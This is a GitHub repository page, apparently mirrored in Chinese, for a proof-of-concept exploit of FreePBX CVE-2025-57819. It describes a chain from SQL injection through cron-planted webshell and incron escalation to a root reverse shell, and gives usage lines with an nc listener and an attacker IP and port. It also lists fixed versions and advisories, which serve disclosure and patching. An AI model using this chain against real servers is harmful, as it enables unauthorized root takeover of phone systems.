ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
GitHub: ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
针对 FreePBX CVE-2025-57819 漏洞的全链 PoC,通过 SQL 注入链式实现远程代码执行并提权至 root。
Stars: 0 | Forks: 0
# CVE-2025-57819 — FreePBX SQLi → RCE → Root
CVE-2025-57819 的全链 PoC。FreePBX 的 endpoint 模块中存在的未经身份验证的基于错误的 SQL 注入,通过 cron job 注入和 incron 提权链式获取 root shell。
## 功能说明
```
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
```
1. 通过 `/admin/ajax.php` 上的基于错误的注入提取数据库信息
2. 注入一个 cron job,将 PHP webshell 写入 web 根目录
3. 等待 cron 触发(约 60 秒),以 `asterisk` 身份确认 RCE
4. 创建一个 incron 触发文件,以 root 身份触发 `fwconsole` 钩子
5. 在你的监听器上捕获反弹 shell
## 设置
```
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
```
## 用法
```
python3 CVE-2025-57819.py [--cleanup]
```
首先启动一个监听器:
```
nc -lvnp 9999
```
然后运行:
```
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
```
`--cleanup` 会在漏洞利用后移除 webshell 和 cron job。
## 受影响版本
安装了 `endpoint` 模块的 FreePBX。`/admin/ajax.php` 中的 `brand` 参数在未过滤的情况下被传入 SQL 查询。
| FreePBX | 已修复版本 |
|---------|----------------|
| 15.x | `15.0.66` |
| 16.x | `16.0.89` |
| 17.x | `17.0.3` |
## 参考
- [FreePBX 安全公告 GHSA-m42g-xg4c-5f3h](https://github.com/freepbx/security-reporting/security/advisories/GHSA-m42g-xg4c-5f3h)
- [NVD — CVE-2025-57819](https://nvd.nist.gov/vuln/detail/CVE-2025-57819)
## 作者
ozcanpng — [github.com/ozcanpng](https://github.com/ozcanpng) — [ozcanpng.dev](https://ozcanpng.dev)
标签:CISA项目, CSV导出, CVE-2025-57819, 协议分析, 多线程, 权限提升, 逆向工具